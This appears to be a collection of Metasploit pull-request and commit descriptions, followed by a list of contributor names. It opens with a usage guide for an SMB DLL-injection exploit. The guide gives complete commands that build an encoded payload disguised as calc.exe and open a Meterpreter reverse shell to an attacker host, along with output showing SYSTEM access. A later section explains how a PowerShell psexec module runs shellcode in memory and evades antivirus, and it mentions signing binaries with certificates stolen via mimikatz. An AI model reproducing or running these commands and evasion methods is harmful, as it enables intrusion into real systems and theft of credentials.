This is an implementation of using the SMBFileServer mixin to perform
DLL injection over SMB.
Exploitation can be performed by starting the dllinjector exploit
which will remain resident until a DLL is downloaded and a session
created. By generating an executable using the windows/loadlibrary
payload it is possible to test the SMBServer mixin on various platforms,
but also serves as a novel injection method where LoadLibrary calls are
not being filtered by Antivirus or EMET.
Example Run
```
# msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp SHARE=share DLL=exploit.dll LHOST=172.32.255.1 LPORT=4444 SRVHOST=172.32.255.1 E
[*] Initializing modules...
PAYLOAD => windows/meterpreter/reverse_tcp
SHARE => share
DLL => exploit.dll
LHOST => 172.32.255.1
LPORT => 4444
SRVHOST => 172.32.255.1
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious dll...
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.dll
[*] Sending stage (769536 bytes) to 172.32.255.128
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.128:1186) at 2014-04-24 11:18:55 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Reproduction Steps
* Generate dllinjector executable (non-malicious)
```
msfpayload windows/loadlibrary DLL="\\\\1.2.3.4\\share\\exploit.dll" R | msfencode -b '\x00' -t exe -x calc.exe -k -o dllinjector.exe -e x86/shikata_ga_nai -c 3
```
* Run DLL Injection server
```
msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=4444 SRVHOST=1.2.3.4 SHARE=share DLL=exploit.dll E
```
* Execute dllinjector.exe on the target host
* Monitor the generated traffic in Wireshark
* Enjoy shells.
Verification
Land #3074
Land #3075
Generate loadlibrary executable
Load dllinjector with payload
Run executable on target
Tested on:
Windows 7 (x86/x64)
Windows Server 2003
Windows Server 2008
So after making changes for MSIE modules (see #3161), I decided to
take a look at all MS modules, and then I ended up changing all of
them. Reason is the same: if you list modules in an ordered list
, this is a little bit easier to see for your eyes.
Add Rex powershell parser:
reads PSH, determines functions, variables, blocks
compresses and cleans up the code it's read, obfuscates
handles string literals and reserved variable names
extracts code blocks and functions for reuse
turns powersploit into a useful sub-component for MSF
Rewire Msf powershell modules
Make use of Rex parser
Handles payload generation, substituions
Brings convenience methods - byte array generation and download
Re-add .NET compiler
Compiles .NET code (C#/VB.NET) in memory
Can generate binary output file (dynamic persistence)
Handles code-signing (steal cert with mimikatz, sign your bin)
Not detected by AV (still...)
Update payload generation
GZip compression and decompression (see Rex module as well)
msftidy violations for space efficiency - each char counts
Re-submit psexec-psh
Makes use of updated Msf and Rex modules
Runs shellcode in-memory (in a hidden PSH window)
Completely bypasses all AVs tested for the last year...
The original module suffered from a small problem - interactive
process notification from Desktop 0 for users currently logged in.
Although acheiving full AV evasion, we were setting off UserAlert.
This commit updates the module itself to match #1379 in R7's repo.
The size of powershell payloads has been reduced, and a wrapper
added to hide the actual payload process entirely.
This commit rewires the existing work on PSExec performed by R3dy,
HDM, and countless others, to execute a powershell command instead
of a binary written to the disk. This particular iteration uses
PSH to call .NET, which pull in WINAPI functions to execute the
shellcode in memory. The entire PSH script is compressed with ZLIB,
given a decompressor stub, encoded in base64 and executed directly
from the command-line with powershell -EncodedCommand.
In practice, this prevents us from having to write binaries with
shellcode to the target drive, deal with removal, or AV detection
at all. Moreover, the powershell wrapper can be quickly modified
to loop execution (included), or perform other obfu/delay in order
to confuse and evade sandboxing and other HIDS mechanisms.
This module has been tested with x86/x64 reverse TCP against win6,
win7 (32 and 64), and Server 2008r2. Targets tested were using
current AV with heuristic analysis and high identification rates.
In particular, this system evaded Avast, KAV current, and MS' own
offerings without any issue. In fact, none of the tested AVs did
anything to prevent execution or warn the user.
Lastly, please note that powershell must be running in the same
architecture as the payload being executed, since it pulls system
libraries and their functions from unmanaged memory. This means
that when executing x86 payloads on x64 targets, one must set the
RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
Failed exploit attempts leave the service in a state where the port is
still open but login attmempts reset the connection. Rescue that and
give the user an indication of what's going on.
Since "Anonymous" has become a well known organization, the meaning of the
term also may cause confusion. In order to clarify, we correct unknown
authors to simply "Unknown".
Florian Gaultier
Matthew Hall
Meatballs
agix
sinn3r
David Maloney
William Vu
scriptjunkie
Tod Beardsley
Tab Assassin
violet
HD Moore
RageLtMan
James Lee
Rob Fuller
sinn3r
lmercer
Christian Mehlmauer
Alexandre Maloteaux
jvazquez-r7
Tod Beardsley
David Maloney
David Rude
Joshua Drake
amaloteaux
James Lee